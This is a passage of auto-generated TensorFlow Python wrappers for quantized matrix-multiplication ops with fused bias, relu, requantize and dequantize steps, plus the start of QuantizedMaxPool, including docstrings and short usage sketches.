_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
def quantized_mat_mul_with_bias_and_dequantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""TODO: add doc.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_a: A `Tensor` of type `float32`.
max_a: A `Tensor` of type `float32`.
min_b: A `Tensor` of type `float32`.
max_b: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
Toutput: A `tf.DType` from: `tf.float32`.
transpose_a: An optional `bool`. Defaults to `False`.
transpose_b: An optional `bool`. Defaults to `False`.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `Toutput`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndDequantize", name, a, b, bias, min_a,
max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_dequantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndDequantize", a=a, b=b, bias=bias,
min_a=min_a, max_a=max_a,
min_b=min_b, max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndDequantize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
QuantizedMatMulWithBiasAndDequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndDequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_dequantize))
def quantized_mat_mul_with_bias_and_dequantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndDequantize", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndDequantize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_QuantizedMatMulWithBiasAndReluOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndRelu",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_relu(a, b, bias, min_a, max_a, min_b, max_b, Toutput=_dtypes.qint32, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Perform a quantized matrix multiplication of `a` by the matrix `b` with bias
add and relu fusion.
The inputs must be two-dimensional matrices and 1D bias vector. And the inner
dimension of `a` (after being transposed if `transpose_a` is non-zero) must
match the outer dimension of `b` (after being transposed if `transposed_b` is
non-zero). Then do broadcast add operation with bias values on the matrix
multiplication result. The bias size must match inner dimension of `b`. Then do
relu activation to get non-negative result.
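The call pattern mirrors `QuantizedMatMulWithBias`, except that `bias` must
be `float32`; a minimal sketch (shapes and ranges are illustrative
assumptions, and the fused kernel is typically only registered in
oneDNN/MKL-enabled builds):

  import tensorflow as tf

  a = tf.quantization.quantize(tf.ones([2, 3]), 0.0, 1.0, tf.quint8)
  b = tf.quantization.quantize(tf.ones([3, 4]), -1.0, 1.0, tf.qint8)
  out = tf.raw_ops.QuantizedMatMulWithBiasAndRelu(
      a=a.output, b=b.output, bias=tf.zeros([4]),
      min_a=a.output_min, max_a=a.output_max,
      min_b=b.output_min, max_b=b.output_max)
  # out.out is qint32 and non-negative because the relu is fused in.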
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor` of type `float32`.
A 1D bias tensor whose size matches the inner dimension of `b` (after being
transposed if `transpose_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode: either MIN_FIRST (the default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndRelu", name, a, b, bias, min_a,
max_a, min_b, max_b, "Toutput", Toutput, "transpose_a", transpose_a,
"transpose_b", transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_relu_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, Toutput=Toutput,
transpose_a=transpose_a, transpose_b=transpose_b,
input_quant_mode=input_quant_mode, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndRelu", a=a, b=b, bias=bias, min_a=min_a,
max_a=max_a, min_b=min_b,
max_b=max_b, Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Toutput", _op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndRelu = tf_export("raw_ops.QuantizedMatMulWithBiasAndRelu")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_relu))
def quantized_mat_mul_with_bias_and_relu_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Toutput", Toutput, "transpose_a",
transpose_a, "transpose_b", transpose_b, "input_quant_mode",
input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
_QuantizedMatMulWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndReluAndRequantize",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_relu_and_requantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput=_dtypes.quint8, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Perform a quantized matrix multiplication of `a` by the matrix `b` with bias
add and relu and requantize fusion.
The inputs must be two-dimensional matrices and 1D bias vector. And the inner
dimension of `a` (after being transposed if `transpose_a` is non-zero) must
match the outer dimension of `b` (after being transposed if `transposed_b` is
non-zero). Then do broadcast add operation with bias values on the matrix
multiplication result. The bias size must match inner dimension of `b`. Then do
relu activation to get non-negative result. Then do requantize operation to get
final uint8 result.
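A minimal sketch (the frozen output range below is an illustrative
assumption; the fused kernel is typically only registered in
oneDNN/MKL-enabled builds):

  import tensorflow as tf

  a = tf.quantization.quantize(tf.ones([2, 3]), 0.0, 1.0, tf.quint8)
  b = tf.quantization.quantize(tf.ones([3, 4]), -1.0, 1.0, tf.qint8)
  out = tf.raw_ops.QuantizedMatMulWithBiasAndReluAndRequantize(
      a=a.output, b=b.output, bias=tf.zeros([4]),
      min_a=a.output_min, max_a=a.output_max,
      min_b=b.output_min, max_b=b.output_max,
      min_freezed_output=0.0, max_freezed_output=6.0)
  # out.out is quint8, requantized into the frozen range [0, 6].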
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
A 1D bias tensor whose size matches the inner dimension of `b` (after being
transposed if `transpose_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
min_freezed_output: A `Tensor` of type `float32`.
The float value that the minimum quantized output value after requantize
represents.
max_freezed_output: A `Tensor` of type `float32`.
The float value that the maximum quantized output value after requantize
represents.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode: either MIN_FIRST (the default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndReluAndRequantize", name, a, b, bias,
min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_relu_and_requantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndReluAndRequantize", a=a, b=b, bias=bias,
min_a=min_a,
max_a=max_a,
min_b=min_b,
max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_relu_and_requantize))
def quantized_mat_mul_with_bias_and_relu_and_requantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedMatMulWithBiasAndRequantizeOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndRequantize",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_requantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput=_dtypes.quint8, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""TODO: add doc.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_a: A `Tensor` of type `float32`.
max_a: A `Tensor` of type `float32`.
min_b: A `Tensor` of type `float32`.
max_b: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
transpose_a: An optional `bool`. Defaults to `False`.
transpose_b: An optional `bool`. Defaults to `False`.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndRequantize", name, a, b, bias, min_a,
max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_requantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndRequantize", a=a, b=b, bias=bias,
min_a=min_a, max_a=max_a,
min_b=min_b, max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndRequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndRequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_requantize))
def quantized_mat_mul_with_bias_and_requantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndRequantizeOutput._make(_result)
return _result
_QuantizedMaxPoolOutput = collections.namedtuple(
"QuantizedMaxPool",
["output", "min_output", "max_output"])
def quantized_max_pool(input, min_input, max_input, ksize, strides, padding, name=None):
r"""Produces the max pool of the input tensor for quantized types.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The 4D (batch x rows x cols x depth) Tensor to max-pool over.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
ksize: A list of `ints`.
The size of the window for each dimension of the input tensor.
The length must be 4 to match the number of dimensions of the input.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor. The length must be 4 to match the number of dimensions of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor`. Has the same type as `input`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMaxPool", name, input, min_input, max_input, "ksize",
ksize, "strides", strides, "padding", padding)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_max_pool_eager_fallback(
input, min_input, max_input, ksize=ksize, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMaxPool", input=input, min_input=min_input,
max_input=max_input, ksize=ksize, strides=strides,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
